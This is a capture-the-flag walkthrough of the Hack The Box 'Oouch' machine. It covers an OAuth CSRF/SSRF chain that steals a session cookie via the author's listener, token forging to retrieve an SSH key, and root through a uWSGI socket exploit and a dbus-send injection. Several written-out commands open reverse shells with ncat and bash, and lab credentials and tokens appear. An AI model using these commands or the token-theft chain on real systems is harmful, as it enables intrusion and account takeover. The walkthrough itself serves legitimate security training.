OOUCH — HTB walkthrough
I liked the machine was designed to be attacked.Though it was quite non responsive many times. The machine introduced a good amount of CSRF and oauth attack. Good machine to learn a lot. Let’s get to work without much chit chat.
CSRF
OAUTH TOKEN BYPASS
uWISG - mu wiz gee
Dbus
DockerENUMERATION
nmap scan
FTP 21 Enumeration
— — Flask Web Framework for Consumer
— — Django Web Framework for Authorization Server
SSH 22 ENUMERATION
— — Great, we see here we will require SSH public key in its known hosts. So whenever we will be getting user having access to .ssh we can try login into SSH by modifying authorized_keys by adding our public key there, or directly login into someone if we have their private key.
PORT 5000/8000 Enumeration
— — Port 5000 Consumer Server && — — Port 8000 Authorization Server
Port 5000
WELCOME TO OOUCH
— Home | — Login | — Register
Lets’ register a user and login.
Juicy things in Profile
— — No Accounts connected
Also in contact we see message, which hints us this field is not for malicious inputs,then it could be SSRF. — — to contact admin
Lets’ have a gobuster scan for this site, to explore other directories.
We see here interesting directory oauth, let’s visit that. Remember Django is our authorization server.
On visiting these page they show error, cause 10.10.10.177 is not mapped to consumer.oouch.htb.Let’s do that in /etc/hosts file
Login into Consumer.oouch.htb
After login we go to connect link
http://consumer.oouch.htb:5000/oauth/connect
Which redirects to authorization.htb.oouch — — — add this to our host file /etc/hosts and reload the connect link
On visiting home page, authorization.oouch.htb:8000/, We find option to register and login. Lets’ register there.
Now as we have seen earlier ,that after connecting our account we should login. Here we will login as ADMIN instead of account we have created as Offs3cg33k.
For this let’s visit http://consumer.oouch.htb:5000/oauth/connect
Keep burp suite intercept on for intercepting request. We see authorize request. But we don’t want to authorize ourselves to our account. We want to authorize ourselves to Admin account. So we will send the link (SSRF link) via contact to admin to connect to us. For this using burp do as follows.
Keeping intercept on, click on authorize
Forward POST /oauth/authorize/?client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read
Capture next oauth/token request in repeater and drop it.
Request : GET /oauth/connect/token?code=m8dHG9yUfSuBIZBde4HjD5lkcBvWIT
This request contains oauth token, to our account.
Now we go to contact page: consumer.oouch.htb:5000/contact
SEND this to admin using contact form
http://consumer.oouch.htb:5000/oauth/connect/token?code=m8dHG9yUfSuBIZBde4HjD5lkcBvWIT
Now again keeping burp on, lets’ go to link (do not go to login from consumer.oouch.htb:5000/oauth — — this will redirect the request to you own authorization, but we need it from admin account, so open this link separately on new tab)
http://consumer.oouch.htb:5000/oauth/login
And authorize the request
Now we have profile for QTC.
QTC Enumeration
So we have credentials for developer. Let’s do a quick gobuster scan on authorization.oouch.htb:8000/
“applications” directory is found let’s explore that. Authentication screen appears, but we cannot login as develop : supermegasecureklarabubu123!
Let’s continue with our gobuster bruteforcing
We found a directory named register. Let’s browse there with our credentials:
We got an option to register a new application. I have copied the following values from register app screen. These values will be used for further oauth exploitation.
App URL: http://authorization.oouch.htb:8000/oauth/applications/2/ClientID :SIcsxLuXJx8WbgWiAcv1Teym8QBZIBfKQn7j8MzoClient Secret : vlsWSCe4eADFljdLrDHrMWz7vlU4XpZ3TIKDqTtBndhgrbZQ1HRg6MEieIdx7A2feux2IIE183qnpSJea6qd5GU6nNqRN04jXyh3capIJMaPmi0ZAdKGFm21uP87EdQHAuth Grant Type : Authorization Code.Redirect URI : <our server>
Hint: We are sending redirect URI as our server, so that we could capture the cookie of QTC user.
Now using contact of QTC we will send an OAUTH request to authorize our application
For this first we will craft our request.
Refer : https://www.oauth.com/oauth2-servers/authorization/the-authorization-request/
So our request will look something like this:
http://authorization.oouch.htb:8000/oauth/authorize/?client_id=SIcsxLuXJx8WbgWiAcv1Teym8QBZIBfKQn7j8Mzo&redirect_uri=http://10.10.14.155:1234/&grant_type=authorization_code&client_secret=vlsWSCe4eADFljdLrDHrMWz7vlU4XpZ3TIKDqTtBndhgrbZQ1HRg6MEieIdx7A2feux2IIE183qnpSJea6qd5GU6nNqRN04jXyh3capIJMaPmi0ZAdKGFm21uP87EdQH
Keeping netcat listener on, on our machine at port 1234. Send this using Offs3cg33k’s profile contact
On netcat after few minutes you will find
sessionid=wrbn82e4k9b6c03ghyntj1vhopfepuj3
Why we did what we did above? Because we want QTC to allow register our app , but clicking on oauth SSRF link we sent above. By this we captured the auth token of QTC, because we knew that session’s id will be required while registering app, as it was part of registration <grant type > we created above.
EXPLOITATION
Now using cookie editor we will log into authorization account of QTC instead of Offs3cg33k
Now change the session id with what we have got
Save And reload the page
We have already used /oauth/authorize to exploit the SSRF vulnerability and login into authorization as QTC. Now we will use /oauth/token to get the token. For this we need to make changes to our application we created earlier, . We will change grant type from : Authorization Code to Client Credentials
Why ? because of course we need creds of qtc dude !!!
For this first visit application at http://authorization.oouch.htb:8000/oauth/applications/2/
For doing this first login into : Authorization.oouch.htb:8000/login , as Offs3cg33k_auth
After saving changes
Login into QTC
How ? — — Cookie might have been expired , so again send the request from 10.10.10.177:5000/contact to admin and listen on netcat. Capture new cookie and make changes in cookie editor and login as QTC
Now keeping burp suite on, go to oauth/token
To forge the token we need to make changes to request
Refer : https://www.oauth.com/oauth2-servers/device-flow/token-request/
So changes in our request will be as follows and response to it is captured on repeater
Now we have got our access token for QTC
“access_token”: “h64xX5uJzsUycz2znMow22tG9q6MnP”
As per the hint in documents in QTC profile : /api/get_user >>> user data
Forged request : http://authorization.oouch.htb:8000/api/get_user?access_token=h64xX5uJzsUycz2znMow22tG9q6MnP
Now as per the hint in documents, ssh key can be obtained using the same trick
http://authorization.oouch.htb:8000/api/get_ssh?access_token=h64xX5uJzsUycz2znMow22tG9q6MnP
Now we will make some changes to bring this in format
Now let us edit the key.
- Remove all \n new line characters
- Also user data from beginning
Got USER !!!!
PRIVILEGE ESCALATION
Start with enumerating user qtc and rights
In home directory we find some notes
Listing the processes we find
Docker is running a proxy on 172.18.0.1/16 range. Lets’ see the IP configuration.
Lets’ try to connect to docker using the ssh keys we have in home folder in .ssh/authorized_keys
Hit and trial gives us ssh login at 172.18.0.3
Enumerating processes we see
uWSGI (source code), pronounced “mu wiz gee”, is a Web Server Gateway Interface (WSGI) server implementation that is typically used to run Python web applications.
Enumerating more shows us a directory code. The config file shows us:
We have uswgi.socket in /tmp folder which has been controlled by www-data
Also as per the hint in .note.txt , when we see in the routes.py file on oouch we see a way to protect xss attack is implied.
To see what it has , lets’ see in config files on qtc
We see here that www-data can receive and send messages, when handling XSS attack.
Exploitation to get root
Lets first see uwsgi exploitation. We can get uwsgi_exploit python script on github.
We will transfer uwsgi_exp.py and ncat from our machine to oouch
Now we will need to transfer these files from oouch to docker . We can do this using scp
Now on docker we will run the script
The error occurs because bytes module is already imported, so we need to make changes in our uwsgi_exp.py and transfer it again
after saving this transfer it back to qtc@172.18.0.5:/tmp, as we did above using curl.
Open netcat on qtc@oouch : nc -lvp 3333
meanwhile send the request from qtc@172.18.0.5:/tmp , to give shell on qtc@oouch
Request from qtc@172.18.0.5:/tmp =
Python uwsgi_exp.py -m unix -u /tmp/uwsgi.socket -c “/tmp/ncat -e /bin/bash 172.17.0.1 3333”By this you get a reverse shell of www-data on qtc@oouch.
Explotation 2
From www-data send a dbus message and you get a shell to root on qtc@172.18.0.5
Message from www-data:
Dbus-send — system — print-reply — dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block “string :; rm /tmp/offs3cg33k; mkfifo /tmp/offs3cg33k | /bin/bash -i 2>&1 | ncat 172.18.0.5 2345 > /tmp/offs3cg33k;”What are we doing here:
- Dbus-send : sends the message
- — system : type of message
- — print-reply : print what reply is generated
- — dest= where you want to send this < we want to send this to Block object, which is made to Block XSS kind of attacks>
- Destination object path = /htb/oouch/Block
- sending message from htb.oouch.Block.Block object that
- String : ; means string value contains nothing
- Remove /tmp/offs3cg33k == offs3cg33k is name of named pipe we want to create and remove if already created
- Make FIFO pipe : offs3cg33k , a namedpipe
- Then run /bin/bash interactive mode sending error to output
- And then run ncat from the interactive bash , to give a reverse connection on port 2345 and send the output to namedpipe offs3cg33k
This process is called bi-directional ncat connection using named pipe
Sending this from www-data , we get a root shell on qtc@172.18.0.5
Get root.txt from there, <Appologies : forgot to take screenshots of this>
ROOTED!!!
Comments and responses are most welcome. If you liked the walkthrough please like. Happy hacking.
